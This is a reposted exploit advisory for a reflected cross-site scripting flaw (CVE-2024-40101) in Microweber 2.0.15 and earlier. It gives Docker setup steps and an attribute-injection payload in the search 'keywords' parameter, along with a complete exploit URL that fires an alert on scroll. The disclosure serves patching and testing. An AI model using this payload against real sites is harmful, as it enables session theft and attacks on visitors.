Microweber 2.0.15 Cross Site Scripting
2024-8-6 21:46:50 Author: packetstormsecurity.com(查看原文) 阅读量:2 收藏

# Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)
# Date: 16.07.2024
# Exploit Author: Prerak Mittal
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15
# Version: <=v2.0.15
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-40101

# Description:
## App Installation:
1. Clone the repository and build the application using docker:
```
git clone -b v2.0.15 https://github.com/microweber/microweber.git
cd microweber
docker compose up -d
```
2. Visit http://localhost
3. Follow along the UI installation process.

## Steps to reproduce:

1. Visit http://localhost/search
2. Insert the below payload in `keywords` parameter:
"onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"

Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22

3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.


文章来源: https://packetstormsecurity.com/files/179921/microweber2015search-xss.txt
如有侵权请联系:admin#unsafe.sh